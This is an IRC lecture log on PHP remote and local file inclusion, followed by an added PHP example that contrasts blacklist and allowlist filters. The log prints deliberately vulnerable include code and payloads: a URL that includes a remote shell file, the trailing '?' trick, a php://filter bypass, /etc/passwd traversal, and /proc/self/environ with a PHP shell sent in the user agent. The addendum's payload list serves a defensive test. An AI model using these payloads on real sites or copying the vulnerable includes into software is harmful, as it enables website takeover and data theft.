 
IRC Lecture by sToRm, pSyChOmOnkee, and RoMeO

[22:30] <RoMeO> alright
[22:30] <RoMeO> I will start with RFI / LFI
[22:31] <RoMeO> RFI stands for Remote File Inclusions, it's very risky... and a good exploiter can gain root privs by it
[22:31] <RoMeO> let's take this sample vuln. code
[22:31] <RoMeO> <?php $page = $_GET['p']; if(isset($page)) { include($page); } ?>
[22:32] <RoMeO> any newbie to PHP has made this mistake.. one way or another (but me of course ;p)
[22:32] <RoMeO> atm what's going on is, ?p= gets included in the page, a normal use would be ?p=contactus.php for example
[22:33] <RoMeO> a malicious user would attempt to include a remote file, ?p=http://www.darkmindz.com/shell/x2300.txt?
[22:34] <RoMeO> the remote file can be as simple as a 1 line shell, and from there he can take over your website... sucks eh
[22:34] <RoMeO> now to fix it
[22:35] <RoMeO> some smartass people think "oh, if we look for http or www in the $_GET['p'], we can terminate the attack!!!!111"
[22:35] <RoMeO> wrong of course, an attacker can use ftp://google.com
[22:35] <RoMeO> or https:
[22:35] <RoMeO> etc
[22:35] <RoMeO> so to fix it, we can use a switch:
[22:35] <RoMeO> <?php
[22:35] <RoMeO> $page = $_GET['page'];
[22:35] <RoMeO> switch($page) {
[22:35] <RoMeO> case "despre":
[22:35] <RoMeO> include("despre.php");
[22:35] <RoMeO> break;
[22:35] <RoMeO> case "parteneri":
[22:35] <RoMeO> include("parteneri.php");
[22:35] <RoMeO> break;
[22:35] <RoMeO> case "contact":
[22:35] <RoMeO> include("contact.php");
[22:35] <RoMeO> break; }
[22:35] <RoMeO> ?>
[22:35] <RoMeO> what happens here is...
[22:36] <RoMeO> it checks for ?page=, and then compares it with the switch variables.. if it's one of them, it would do the include, else it would just do nothing
[22:36] <RoMeO> you can always do a global securing, if you don't wish to change your full page nav, by doing the following:
[22:36] <RoMeO> <?php
[22:36] <RoMeO> $page = $_GET['page'];
[22:36] <RoMeO> if(preg_match('/http/i', $page) || preg_match('/ftp/i', $page))
[22:36] <RoMeO> {
[22:36] <RoMeO> die("Not Today");
[22:36] <RoMeO> }
[22:36] <RoMeO> ?>
[22:37] <Sean> what about php://
[22:37] <Sean> ;)
[22:37] <RoMeO> sean you had to fuck with it eh
[22:37] <Sean> yup
[22:37] <Sean> sorry
[22:37] <RoMeO> alright you add php there
[22:37] <RoMeO> :P
[22:37] <RoMeO> anyways
[22:38] <RoMeO> tell us more about php:// sean
[22:38] <RoMeO> what can you do with that wrapper
[22:38] <Sean> uh
[22:38] <Sean> you can manage input output streams first off
[22:38] <Sean> access internal resources
[22:38] <RoMeO> alright, let's move to LFI then ^^
[22:39] <SeXy_aka_pur3> If I have found an LFI vuln., can I read files which are hosted on the same server but on a different domain? for example /home/victim/index.php?=../../ but I want to access /victim2's site. Is it possible?
[22:39] <sToRm> any questions so far?
[22:39] <RoMeO> sexy,
[22:39] <RoMeO> depends on the chown of the files
[22:39] <RoMeO> if
[22:39] <RoMeO> apache runs on nobody
[22:39] <RoMeO> and the server is not secured by sean
[22:39] <RoMeO> then yes
[22:39] <SeXy_aka_pur3> ok, thanks :)
[22:40] <RoMeO> oh btw
[22:40] <RoMeO> nvm, I will explain this trick when we get to LFI
[22:40] <RoMeO> any questions?
[22:40] <RoMeO> k +m i guess
[22:40] <pSyChOmOnkee> hold on romeo
[22:40] <Sean> http://example.com/rfi.php?page=php://filter/resource=http://www.example.com
[22:40] <RoMeO> alright
[22:41] <pSyChOmOnkee> one thing to add
[22:41] <RoMeO> nice sean, that was included in a challenge on a site I go to... can't believe I missed it :|
[22:41] <pSyChOmOnkee> when romeo included the shell
[22:41] <Sean> lol
[22:41] <pSyChOmOnkee> you may have noticed that it ended in .txt
[22:41] <Sean> simple php
[22:41] <Sean> <3
[22:41] <pSyChOmOnkee> instead of .php
[22:42] <pSyChOmOnkee> hay guise im talking
[22:42] <Sean> k
[22:42] <pSyChOmOnkee> this is because of this:
[22:44] <sToRm> say
[22:44] <sToRm> we have the code
[22:44] <sToRm> <?php include($_GET['rfi']); ?>
[22:44] <sToRm> we can just include
[22:44] <sToRm> ?rfi=http://www.somewhere.com/shell.txt
[22:44] <sToRm> but
[22:44] <sToRm> most people code like this:
[22:44] <sToRm> <?php include($_GET['rfi'].'.php'); ?>
[22:44] <sToRm> so
[22:45] <sToRm> if we were to include our shell
[22:45] <sToRm> it would actually be
[22:45] <sToRm> http://www.somewhere.com/shell.txt.php
[22:45] <sToRm> bad
[22:45] <sToRm> so
[22:45] <sToRm> by adding a ?
[22:45] <sToRm> to the .txt
[22:45] <sToRm> we are essentially adding .php to the get variables
[22:45] <sToRm> or "commenting it out," to put it simply
[22:45] <sToRm> i suppose
[22:46] <sToRm> so it then becomes http://www.somewhere.com/shell.txt?.php
[22:46] <sToRm> so
[22:46] <sToRm> RoMeO
[22:46] <sToRm> LFI pl0x
[22:46] <RoMeO> LFI
[22:46] <RoMeO> k
[22:47] <RoMeO> alright so LFI is local file inclusions (include files locally?), basically, you can read (or parse) files from the local server
[22:48] <RoMeO> this isn't very dangerous when it comes to your local skiddy user for example, he would just move on, or get the /etc/passwd and post it on show off sections
[22:49] <RoMeO> but, someone with half a brain would probably upload a picture to the server by another site on the server.. and in that picture, there would be a simple PHP code, that will be parsed
[22:49] <RoMeO> or, someone can include /proc/self/environ, which are the env variables of the current running process (apache) in this case
[22:50] <RoMeO> now from there, he can exploit that by simply changing his user agent to a php shell, and it would get parsed normally
[22:50] <RoMeO> how to fix LFI
[22:50] <RoMeO> use the switch, as noted in RFI ^
[22:50] <RoMeO> and for a global fix, before sean says anything about it
[22:51] <RoMeO> we look for ".." and "/" in the $_GET vars, anything to say here sean?
[22:51] <RoMeO> k
[22:51] <Sean> what if it's windows.
[22:51] <RoMeO> then we block \
[22:51] <Sean> and what do you mean by "look"
[22:51] <Sean> do you mean stop execution or strip it?
[22:52] <RoMeO> as in, we preg_match the $_GET vars for those .. and /, and if we find them, we die();
[22:52] <Sean> ah
[22:52] <Sean> another tip
[22:52] <Sean> never
[22:52] <Sean> ever
[22:52] <Sean> ever
[22:52] <Sean> ever
[22:52] <RoMeO> we can strip it too, by str_ireplace
[22:52] <Sean> strip ../
[22:52] <Sean> never strip it
[22:52] <Sean> because
[22:52] <Sean> why not just do
[22:52] <Sean> ..
[22:52] <Sean> go back a directory
[22:52] <RoMeO> we strip ..
[22:52] <RoMeO> and /
[22:52] <Sean> for example an indexer
[22:53] <RoMeO> each one on its own
[22:53] <Sean> :)
[22:53] <sToRm> just to add, LFI-vuln code is exactly like RFI-vuln code, except it has a folder or a path before the variable, such as:
[22:53] <sToRm> <?php include('includes/'.$_GET['rfi']); ?>
[22:53] <Sean> make sure to keep all your includes in a directory too
[22:53] <sToRm> questions?
[22:54] <sToRm> MEH
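Editor's addendum (not part of the IRC log above): the lecture's vulnerable include, the "block http/ftp" blacklist and the switch-style fix written as an allowlist, side by side, with constructed payloads run through both filters. It assumes an includes/ directory holding the three page files named in the lecture (despre.php, parteneri.php, contact.php); the payload list is built here from the bypasses the speakers raise (php://, ../ traversal, /proc/self/environ) plus the data: wrapper, which is this example's own addition. Nothing is fetched from the network.

```php
<?php
// Added example, not code from the lecture. Compares the lecture's two filters
// on constructed payloads and shows why refusing beats stripping.

// Vulnerable pattern from the lecture: the request decides what gets included.
// RFI if allow_url_include=On, LFI either way. Kept only for contrast; never called.
function vulnerable_include(string $p): void
{
    include $p;
}

// Blacklist from the lecture: only the substrings "http" and "ftp" are refused.
function blacklist_allows(string $p): bool
{
    return !(preg_match('/http/i', $p) || preg_match('/ftp/i', $p));
}

// Allowlist fix: the request supplies a key, the application supplies the path.
// Same effect as the lecture's switch, without repeating include() per case.
const PAGES = [
    'despre'    => 'despre.php',
    'parteneri' => 'parteneri.php',
    'contact'   => 'contact.php',
];

function resolve_page(string $key): ?string
{
    return PAGES[$key] ?? null;
}

// $dir is fixed by the application (assumed: includes/ beside this script).
function safe_include(string $key, string $dir = __DIR__ . '/includes'): bool
{
    $file = resolve_page($key);
    if ($file === null) {
        return false;              // unknown key: do nothing, like the switch
    }
    include $dir . '/' . $file;    // user input never reaches the path
    return true;
}

// Why stripping "../" with str_ireplace is weaker than die(): a single pass of
// removal on "....//" leaves "../" behind, so the traversal survives.
function strip_traversal_once(string $p): string
{
    return str_ireplace('../', '', $p);
}

// Constructed payloads (not from any real request).
$payloads = [
    'php://filter/resource=../../etc/passwd',                 // Sean's php:// wrapper
    '../../../../etc/passwd',                                 // plain LFI traversal
    '/proc/self/environ',                                     // User-Agent injection target
    'data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==', // inline PHP; needs allow_url_include
    'https://www.somewhere.com/shell.txt?',                   // contains "http"
    'contact',                                                // legitimate allowlist key
];

if (PHP_SAPI === 'cli') {
    foreach ($payloads as $p) {
        printf("%-58s blacklist: %-6s allowlist: %s\n",
            $p,
            blacklist_allows($p) ? 'ALLOWS' : 'blocks',
            resolve_page($p) === null ? 'blocks' : 'allows');
    }
    echo "\nstrip_traversal_once('....//etc/passwd') => ",
         strip_traversal_once('....//etc/passwd'), "\n";
}
```

Run it from the command line to see the table; the rows with no "http" or "ftp" substring pass the blacklist untouched, while only the three known keys pass the allowlist. The data: row is the one case that needs allow_url_include=On in addition to the include itself; the php://filter and traversal rows work with the default configuration.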